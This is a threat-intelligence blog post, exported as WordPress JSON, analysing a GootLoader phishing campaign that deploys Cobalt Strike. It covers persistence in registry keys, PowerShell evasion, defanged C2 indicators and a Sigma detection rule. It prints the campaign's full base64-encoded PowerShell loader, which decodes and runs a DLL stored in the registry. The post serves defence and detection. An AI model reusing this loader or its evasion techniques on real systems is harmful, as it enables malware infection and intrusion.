{"id":70310,"date":"2022-09-30T15:58:32","date_gmt":"2022-09-30T14:58:32","guid":{"rendered":"https:\/\/www.n-able.com\/?p=70310"},"modified":"2025-08-28T10:38:28","modified_gmt":"2025-08-28T09:38:28","slug":"everything-you-need-to-know-about-tracking-gootloader","status":"publish","type":"post","link":"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader","title":{"rendered":"Everything you Need to Know about Tracking GootLoader"},"content":{"rendered":"<p class=\"ai-optimize-6 ai-optimize-introduction\">The Adlumin Threat Visibility Team has observed an increase in GootLoader-based malware and identified a possible unified campaign leveraging GootLoader with follow-on Cobalt Strike payloads in attempts to breach U.S. businesses including multiple customers.<\/p>\n<h2 class=\"ai-optimize-7\">What is GootLoader?<\/h2>\n<p class=\"ai-optimize-8\">GootLoader is a presumed access-as-a-service malware<span>\u00a0<\/span><sup>1<\/sup>, with its developers also being responsible for the GootKit malware as first reported by Dr. Web in 2014<span>\u00a0<\/span><sup>2<\/sup>. GootKit, the actor\u2019s namesake and original toolkit, is distinct from GootLoader in that GootLoader is closer to an initial access capability which leverages follow on stages such as Cobalt Strike, various Ransomware payloads, and potentially GootKit \u2013 the latter of which has fallen out of favor since gaining notoriety in 2019 due to infrastructure compromise<span>\u00a0<\/span><sup>3<\/sup>.<br \/>\nAs an access-as-a-service malware, the GootLoader operators would be expected to sell direct access to compromised hosts and systems or provide buyers with harvested credentials and access points into a targeted network. A less frequent operation under this model might involve the GootLoader actors loading second-stage payloads as access brokers.<\/p>\n<h2 class=\"ai-optimize-9\">Tracking the Campaign<\/h2>\n<p class=\"ai-optimize-10\">We are observing and tracking an active exploitation campaign utilizing GootLoader against U.S. businesses in multiple industries and verticals. What we\u2019ve observed in this campaign is uniform deployment of Cobalt Strike payloads following exploitation and initial access provided by GootLoader. It\u2019s unknown if these Cobalt Strike payloads are used by GootLoader developers to provide direct access to an infected target or used to harvest credentials and other data which is brokered to a buyer for access or exploited in some other way.<br \/>\n<strong>Our investigation is tracking an exploitation campaign which we defined based on:<\/strong><\/p>\n<ol>\n<li class=\"ai-optimize-11\">Like to identical initial access and exploit methodologies<\/li>\n<li class=\"ai-optimize-12\">Like to identical command and control infrastructure and methodology<\/li>\n<li class=\"ai-optimize-13\">Like to identical operations time-frame<\/li>\n<li class=\"ai-optimize-14\">Like to identical first-stage \u201cloader\u201d malware, GootLoader<\/li>\n<li class=\"ai-optimize-15\">Like to identical second-stage follow-on malware, Cobalt Strike<\/li>\n<\/ol>\n<h2 class=\"ai-optimize-16\">Campaign Tactics, Techniques, and Procedures (TTPs)<\/h2>\n<p class=\"ai-optimize-17\">This GootLoader campaign begins its attack by phishing potential victims\u2019 business emails. Unlike other campaigns reported earlier in 2021 and 2022<sup>4<\/sup>, this campaign has not yet been observed relying on specific SEO poisoning attacks to deliver its payload. We believe the payloads are also not being disguised as legitimate JQuery libraries as previously seen.<br \/>\nIt starts with an email\u2026<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-10638\" src=\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_1.png\" alt=\"\" width=\"791\" height=\"87\" \/><\/p>\n<p class=\"ai-optimize-18\"><em>Figure 1: The Attack Begins with a Malicious JavaScript file contained in a Zip Archive<\/em><\/p>\n<p class=\"ai-optimize-19\">The first stage in the campaign against a target is a simple phishing email. These emails have an attached Zip archive, which contains a JavaScript payload the victim is tricked in to running after opening. This JavaScript payload is executed by a Windows Operating System native binary, Windows Script Host (wscript.exe), which is a legitimate application typically used for logon scripts, administration, and automation and provides an execution environment in which the script can run. Our team believes that the JavaScript payload is delivered via a compressed archive to help mitigate detection by email and malware scanners.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-10640\" src=\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_2.png\" alt=\"GootLoader_Image_2\" width=\"360\" height=\"133\" \/><\/p>\n<p class=\"ai-optimize-20\"><em>Figure 2: JavaScript is executed by wscript.exe<\/em><\/p>\n<p class=\"ai-optimize-21\">GootLoader will then use this wscript.exe executing JavaScript to download an additional\u00a0 JavaScript resource which is loaded by the original calling wscript.exe process. This secondary exploitation payload is responsible for persisting two separate payloads.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-10641\" src=\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_3.png\" alt=\"GootLoader_Image_3\" width=\"416\" height=\"246\" \/><\/p>\n<p class=\"ai-optimize-22\"><em>Figure 3: wscript.exe retrieves payloads from Command and Control Server<\/em><\/p>\n<h2 class=\"ai-optimize-23\">Persistence<\/h2>\n<p class=\"ai-optimize-24\">GootLoader will use its secondary JavaScript payload to write two registry keys to the Window\u2019s Current User registry hive (HKCU). In this tracked campaign the two registry keys were stored in:<\/p>\n<ul>\n<li class=\"ai-optimize-25\">HKCU:\\\\Software\\Microsoft\\Phone\\user0<\/li>\n<li class=\"ai-optimize-26\">HKCU:\\\\Software\\Microsoft\\Phone\\user<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-10642\" src=\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_4.png\" alt=\"GootLoader_Image_4\" width=\"621\" height=\"269\" \/><\/p>\n<p class=\"ai-optimize-27\"><em>Figure 4: wscript.exe runs PowerShell to persist malware as a task, and writes encoded payloads to registry<\/em><\/p>\n<h2 class=\"ai-optimize-28\">Kick-Off<\/h2>\n<p class=\"ai-optimize-29\">After having saved the next two stages to the registry, the wscript.exe process will execute PowerShell to run PowerShell commands which will kick-off the first-stage malware implant. To help evade detection by security software, the executed PowerShell commands make use of multiple evasion techniques including<\/p>\n<ul>\n<li class=\"ai-optimize-30\">Base64 Encoding the Command<\/li>\n<li class=\"ai-optimize-31\">Command abbreviation<\/li>\n<li class=\"ai-optimize-32\">Variable substitution<\/li>\n<li class=\"ai-optimize-33\">String concatenation\n<ul>\n<li class=\"ai-optimize-34\">\n<div>\n<p class=\"ai-optimize-35\">MwA1ADEANAA5ADcAOAA5ADsAcwBsAGUAZQBwACAALQBzACAANwA4ADsAJABqAHQAPQBHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAKAAiAGgAawAiACsAIgBjAHUAOgBcAHMAbwBmACIAKwAiAHQAdwAiACsAIgBhAHIAZQBcAG0AaQBjACIAKwAiAHIAbwBzACIAKwAiAG8AZgB0AFwAUABoAG8AbgBlAFwAIgArAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6ACgAIgB1AHMAZQAiACsAIgByAG4AIgArACIAYQBtAGUAIgApACsAIgAwACIAKQA7AGYAbwByACAAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAZQAgADcAMAAwADsAJABzAHUAcwArACsAKQB7AFQAcgB5AHsAJABzAGEAKwA9ACQAagB0AC4AJABzAHUAcwB9AEMAYQB0AGMAaAB7AH0AfQA7ACQAcwB1AHMAPQAwADsAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAkAHMAdQBzACsAKwA7ACQAawBvAD0AWwBtAGEAdABoAF0AOgA6ACgAIgBzAHEAIgArACIAcgB0ACIAKQAoACQAcwB1AHMAKQA7AGkAZgAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewBiAHIAZQBhAGsAfQB9ACQAaABpAHQAPQAkAHMAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAOwAkAGUAagB2AD0AWwBiAHkAdABlAFsAXQBdADoAOgAoACIAbgBlACIAKwAiAHcAIgApACgAJABoAGkAdAAuAEwAZQBuAGcAdABoAC8AMgApADsAZgBvAHIAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAdAAgACQAaABpAHQALgBMAGUAbgBnAHQAaAA7ACQAcwB1AHMAKwA9ADIAKQB7ACQAZQBqAHYAWwAkAHMAdQBzAC8AMgBdAD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6ACgAIgBUAG8AQgAiACsAIgB5AHQAZQAiACkAKAAkAGgAaQB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdQBzACwAMgApACwAKAAyACoAOAApACkAfQBbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApACgAJABlAGoAdgApADsAWwBPAHAAZQBuAF0AOgA6ACgAIgBUAGUAIgArACIAcwB0ACIAKQAoACkAOwA3ADQANAA0ADkAMQA3ADIAOwA=<\/p>\n<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p class=\"ai-optimize-36\">Decoding from Base64 and encoding with UTF-16LE we can see the commands contents:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-10643\" src=\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_5.png\" alt=\"GootLoader_Image_5\" width=\"624\" height=\"208\" \/><\/p>\n<p class=\"ai-optimize-37\"><em>Figure 5: Decoded PowerShell Command Loading Stage 1 Implant<\/em><\/p>\n<p class=\"ai-optimize-38\">This command will grab the contents of the first registry key, HKCU:\/SOFTWARE\/Microsoft\/phone\/$USERNAME0, decode the encoded .NET DLL it contains, and then run the Test() function contained in the DLL us as an execution start point.<\/p>\n<h2 class=\"ai-optimize-39\">Obtaining Decoded Stage-1<\/h2>\n<p class=\"ai-optimize-40\">To get the malware to drop the DLL unencoded for further analysis rather than directly loading and calling it via PowerShell, we modified the executed PowerShell command to write the contents to a file by appending the following before the last SLEEPfunction.<\/p>\n<p class=\"ai-optimize-41\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 +&gt; Set-Content $PATH -Value $ejv -Encoding Byte<\/p>\n<p class=\"ai-optimize-42\">This allowed us to analyze this first-stage implant to identify that the Test() function was being used to load the second-stage implant.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-10644\" src=\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_6.png\" alt=\"GootLoader_Image_6\" width=\"684\" height=\"264\" \/><\/p>\n<p class=\"ai-optimize-43\"><em>Figure 6: PowerShell.exe decodes the GootLoader implant which decodes and runs the secondary payload, Cobalt Strike<\/em><\/p>\n<h2 class=\"ai-optimize-44\">Second Stage Payload<\/h2>\n<p class=\"ai-optimize-45\">The second payload and malware implant used by GootLoader in this campaign is Cobalt Strike. The second registry key written in the earlier stage to HKCU:\\..Phone\\$USERNAME contains an encoded Cobalt Strike beacon. When the first-stage\u2019s Test() function is executed, it decodes, loads, and executes the Cobalt Strike beacon into memory.<\/p>\n<p class=\"ai-optimize-46\">To analyze the Cobalt Strike beacon we modified the retrieved first payload which loads the beacon, to instead write the beacon unencoded to disk for retrieval and analysis. We did this by adding additional library imports used for writing a file and adding a main function which will call the Test() loader.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-10645\" src=\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_7.png\" alt=\"GootLoader_Image_7\" width=\"408\" height=\"100\" \/><\/p>\n<p class=\"ai-optimize-47\"><em>Figure 7: Adding additional imports to 1st Stage Malware Implant<\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-10646\" src=\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_8.png\" alt=\"GootLoader_Image_8\" width=\"476\" height=\"226\" \/><\/p>\n<p class=\"ai-optimize-48\"><em>Figure 8: Adding function to call the 2nd Stage DLL\u2019s Test() function<\/em><\/p>\n<p class=\"ai-optimize-49\">We then created a BinaryWriter object and comment out some of the lines which would execute the Cobalt Strike beacon.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-10647\" src=\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_9.png\" alt=\"\" width=\"624\" height=\"140\" \/><\/p>\n<p class=\"ai-optimize-50\"><em>Figure 9: Modifying 1st stage to prevent 2nd stage execution and retrieve decoded 2<sup>nd<\/sup><span>\u00a0<\/span>stage<\/em><\/p>\n<p class=\"ai-optimize-51\">After building and running the code, we obtained the decoded second-stage Cobalt Strike payload.<\/p>\n<h2 class=\"ai-optimize-52\">Extracting Campaign IOCs from Cobalt Strike<\/h2>\n<p class=\"ai-optimize-53\">Cobalt Strike is a paid penetration testing software which includes configurable malware implants that are often repurposed for use in real malware operations and infections. The<span>\u00a0<\/span><a href=\"https:\/\/malpedia.caad.fkie.fraunhofer.de\/details\/win.cobalt_strike\" target=\"_blank\" rel=\"noopener\">Cobalt Strike beacon provides functionality<\/a><span>\u00a0<\/span>for the attacker including command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained<sup>[5]<\/sup>.<a href=\"https:\/\/threatpost.com\/cobalt-strike-cybercrooks\/167368\/\" target=\"_blank\" rel=\"noopener\">Cobalt Strike has exploded in popularity<\/a><span>\u00a0<\/span>in usage by cyber-criminals<sup>[6]<\/sup>, and is a perfect launching platform for continued attacks or access transfer.<\/p>\n<p class=\"ai-optimize-54\">Once we had the decoded Cobalt Strike beacon written to disk, we were able to use public decoders to extract Cobalt Strike configuration information such as command and control addresses. We used the Python-based Cobalt Strike Configuration Extractor and Parser which can be found on GitHub,<span>\u00a0<\/span><a href=\"https:\/\/github.com\/strozfriedberg\/cobaltstrike-config-extractor\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-10648\" src=\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_10.png\" alt=\"\" width=\"624\" height=\"192\" \/><\/p>\n<p class=\"ai-optimize-55\"><em>Figure 10: Decoded Cobalt Strike Beacon Payload<\/em><\/p>\n<p class=\"ai-optimize-56\">This allowed us to obtain the malware command and control infrastructure used by the attackers to control the Cobalt Strike implant.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-10649\" src=\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_11.png\" alt=\"\" width=\"705\" height=\"201\" \/><\/p>\n<p class=\"ai-optimize-57\"><em>Figure 11: Cobalt Strike is run and beacons to Cobalt Strike command and control server<\/em><\/p>\n<h2 class=\"ai-optimize-58\">Summary &amp; Future Reads<\/h2>\n<p class=\"ai-optimize-59\">Once the Adlumin Threat Visibility Team had the initial payload, follow-on implant stages, and leads on command-and-control infrastructure, we quickly created detections for our<span>\u00a0<\/span><a href=\"https:\/\/www.n-able.com\/products\/adlumin-managed-detection-and-response\" target=\"_blank\" rel=\"noopener\">MDR platform,<\/a><span>\u00a0<\/span>which merges data from multiple security relevant data sources including the endpoint and installed security software. These detections caught subsequent attacks from the same campaign and identified some historical retroactive activity. Some key defenses and mitigations for the campaign include:<\/p>\n<ul>\n<li class=\"ai-optimize-60\">Adequate<span>\u00a0<\/span>phishing mitigation<span>\u00a0<\/span>and attachment scanning solutions<\/li>\n<li class=\"ai-optimize-61\">Monitoring of wscript.exe executions of JavaScript files from compressed archives<\/li>\n<li class=\"ai-optimize-62\">Monitoring of PowerShell executions, especially of encoded commands, which have a parent process of wscript.exe<\/li>\n<li class=\"ai-optimize-63\">Implementing a<span>\u00a0<\/span><a href=\"https:\/\/adlumin.com\/mdr-platform\/proactive-defense-program\/\" target=\"_blank\" rel=\"noopener\">Proactive Defense program that<\/a><span>\u00a0<\/span>is equipped with fully managed security awareness testing and training, designed to empower employees to recognize and reduce the risk posed by cybercriminals.<\/li>\n<\/ul>\n<p class=\"ai-optimize-64\">Additionally, our team is sharing the following indicators used in this campaign with the community:<\/p>\n<ul>\n<li class=\"ai-optimize-65\">93[.]115[.]29[.]50<\/li>\n<li class=\"ai-optimize-66\">hxxps:\/\/streamlock[.]net<\/li>\n<\/ul>\n<p class=\"ai-optimize-67\">We\u2019d also like to share the below<span>\u00a0<\/span><a href=\"https:\/\/github.com\/SigmaHQ\/sigma\" target=\"_blank\" rel=\"noopener\">Sigma<\/a><span>\u00a0<\/span>rule to help identify possible exploitation activity:<\/p>\n<p class=\"ai-optimize-68\">title: GootLoader Zipped JS WScript<br \/>\nid: 37d82863-216a-41a3-a4de-b09cea08eb92<br \/>\naction: global<br \/>\nstatus: experimental<br \/>\nreferences:<br \/>\n\u2013 https:\/\/adlumin.com<br \/>\ndate: 2022\/09\/26<br \/>\ntags:<br \/>\n\u2013 attack.execution<br \/>\n\u2013 attack.t1059<br \/>\nauthor: Adlumin, Kyle Auer, Kevin O\u2019Connor<br \/>\ndetection:<br \/>\ncondition: selection<br \/>\nlevel: medium<br \/>\nlogsource:<br \/>\ncategory: process_execution<br \/>\nproduct: windows<br \/>\ndetection:<br \/>\nselection_1:<br \/>\nImage|endswith:<br \/>\n\u2013 \u2018\\powershell.exe\u2019<br \/>\nParentImage|endswith<br \/>\n\u2013 \u2018\\wscript.exe\u2019<br \/>\nselection_2:<br \/>\nImage|endswith:<br \/>\n\u2013 \u2018\\wscript.exe\u2019<br \/>\nselection_3:<br \/>\nCommandLine|all:<br \/>\n\u2013 \u2018*AppData*\u2019<br \/>\n\u2013 \u2018*zip*\u2019<br \/>\n\u2013 \u2018*.js*\u2019<br \/>\ncondition: (selection_1 or selection_2) and selection_3<\/p>\n<p class=\"ai-optimize-69\">Make sure to follow N&#8209;able for follow-up posts where we\u2019ll dive deeper into the actor\u2019s infrastructure and operations!<\/p>\n<h2 class=\"ai-optimize-70\">Resources:<\/h2>\n<ol>\n<li class=\"ai-optimize-71\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/g\/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html\" target=\"_blank\" rel=\"noopener\">https:\/\/www.trendmicro.com\/en_us\/research\/22\/g\/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html<\/a><\/li>\n<li class=\"ai-optimize-72\"><a href=\"https:\/\/securelist.com\/gootkit-the-cautious-trojan\/102731\/\" target=\"_blank\" rel=\"noopener\">https:\/\/securelist.com\/gootkit-the-cautious-trojan\/102731\/<\/a><\/li>\n<li class=\"ai-optimize-73\"><a href=\"https:\/\/www.zdnet.com\/article\/gootkit-malware-crew-left-their-database-exposed-online-without-a-password\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.zdnet.com\/article\/gootkit-malware-crew-left-their-database-exposed-online-without-a-password\/<\/a><\/li>\n<li class=\"ai-optimize-74\"><a href=\"https:\/\/blogs.blackberry.com\/en\/2022\/07\/gootloader-from-seo-poisoning-to-multi-stage-downloader\" target=\"_blank\" rel=\"noopener\">https:\/\/blogs.blackberry.com\/en\/2022\/07\/gootloader-from-seo-poisoning-to-multi-stage-downloader<\/a><\/li>\n<li class=\"ai-optimize-75\"><a href=\"https:\/\/malpedia.caad.fkie.fraunhofer.de\/details\/win.cobalt_strike\" target=\"_blank\" rel=\"noopener\">https:\/\/malpedia.caad.fkie.fraunhofer.de\/details\/win.cobalt_strike<\/a><\/li>\n<li class=\"ai-optimize-76\"><a href=\"https:\/\/threatpost.com\/cobalt-strike-cybercrooks\/167368\/\" target=\"_blank\" rel=\"noopener\">https:\/\/threatpost.com\/cobalt-strike-cybercrooks\/167368\/<\/a><\/li>\n<\/ol>\n","protected":false},"excerpt":{"rendered":"<p>GootLoader malware targets US businesses with Cobalt Strike payloads, enabling access-as-a-service attacks. Learn campaign insights and protection tips here.<\/p>\n","protected":false},"author":24,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"class_list":["post-70310","post","type-post","status-publish","format-standard","hentry","topic-cyber-resilience","topic-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.2 (Yoast SEO v27.2) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Everything you Need to Know about Tracking GootLoader - N-able<\/title>\n<meta name=\"description\" content=\"GootLoader malware targets US firms with Cobalt Strike payloads, enabling access-as-a-service attacks. Discover campaign insights and protection tips.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Everything you Need to Know about Tracking GootLoader - N-able\" \/>\n<meta property=\"og:description\" content=\"GootLoader malware targets US firms with Cobalt Strike payloads, enabling access-as-a-service attacks. Discover campaign insights and protection tips.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader\" \/>\n<meta property=\"og:site_name\" content=\"N-able\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/NableMSP\" \/>\n<meta property=\"article:published_time\" content=\"2022-09-30T14:58:32+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-08-28T09:38:28+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.n-able.com\/wp-content\/uploads\/2025\/08\/2508_Adlumin_BlogHeaders_TrackingGootLoader.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"N-able\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Nable\" \/>\n<meta name=\"twitter:site\" content=\"@Nable\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"N-able\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader\"},\"author\":{\"name\":\"N-able\",\"@id\":\"https:\/\/www.n-able.com\/it\/#\/schema\/person\/f46a000e389b6d02bd4b3866e7828a7b\"},\"headline\":\"Everything you Need to Know about Tracking GootLoader\",\"datePublished\":\"2022-09-30T15:58:32+01:00\",\"dateModified\":\"2025-08-28T09:38:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader\"},\"wordCount\":1547,\"publisher\":{\"@id\":\"https:\/\/www.n-able.com\/it\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader#primaryimage\"},\"thumbnailUrl\":\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_1.png\",\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader\",\"url\":\"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader\",\"name\":\"Everything you Need to Know about Tracking GootLoader - N-able\",\"isPartOf\":{\"@id\":\"https:\/\/www.n-able.com\/it\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader#primaryimage\"},\"thumbnailUrl\":\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_1.png\",\"datePublished\":\"2022-09-30T15:58:32+01:00\",\"dateModified\":\"2025-08-28T09:38:28+00:00\",\"description\":\"GootLoader malware targets US firms with Cobalt Strike payloads, enabling access-as-a-service attacks. Discover campaign insights and protection tips.\",\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader#primaryimage\",\"url\":\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_1.png\",\"contentUrl\":\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_1.png\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.n-able.com\/it\/#website\",\"url\":\"https:\/\/www.n-able.com\/it\/\",\"name\":\"N-able\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.n-able.com\/it\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.n-able.com\/it\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.n-able.com\/it\/#organization\",\"name\":\"N-able\",\"url\":\"https:\/\/www.n-able.com\/it\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.n-able.com\/it\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.n-able.com\/wp-content\/uploads\/2021\/02\/logo-n-able-vertical-dark.svg\",\"contentUrl\":\"https:\/\/www.n-able.com\/wp-content\/uploads\/2021\/02\/logo-n-able-vertical-dark.svg\",\"width\":\"1024\",\"height\":\"1024\",\"caption\":\"N-able\"},\"image\":{\"@id\":\"https:\/\/www.n-able.com\/it\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/NableMSP\",\"https:\/\/x.com\/Nable\",\"https:\/\/www.linkedin.com\/company\/n-able\",\"https:\/\/www.youtube.com\/channel\/UClnp77HHg4aME-S-3fWQhFw\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.n-able.com\/it\/#\/schema\/person\/f46a000e389b6d02bd4b3866e7828a7b\",\"name\":\"N-able\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g\",\"caption\":\"N-able\"}}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Everything you Need to Know about Tracking GootLoader - N-able","description":"GootLoader malware targets US firms with Cobalt Strike payloads, enabling access-as-a-service attacks. Discover campaign insights and protection tips.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader","og_locale":"it_IT","og_type":"article","og_title":"Everything you Need to Know about Tracking GootLoader - N-able","og_description":"GootLoader malware targets US firms with Cobalt Strike payloads, enabling access-as-a-service attacks. Discover campaign insights and protection tips.","og_url":"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader","og_site_name":"N-able","article_publisher":"https:\/\/www.facebook.com\/NableMSP","article_published_time":"2022-09-30T14:58:32+00:00","article_modified_time":"2025-08-28T09:38:28+00:00","og_image":[{"width":1600,"height":900,"url":"https:\/\/www.n-able.com\/wp-content\/uploads\/2025\/08\/2508_Adlumin_BlogHeaders_TrackingGootLoader.png","type":"image\/png"}],"author":"N-able","twitter_card":"summary_large_image","twitter_creator":"@Nable","twitter_site":"@Nable","twitter_misc":{"Scritto da":"N-able","Tempo di lettura stimato":"9 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader#article","isPartOf":{"@id":"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader"},"author":{"name":"N-able","@id":"https:\/\/www.n-able.com\/it\/#\/schema\/person\/f46a000e389b6d02bd4b3866e7828a7b"},"headline":"Everything you Need to Know about Tracking 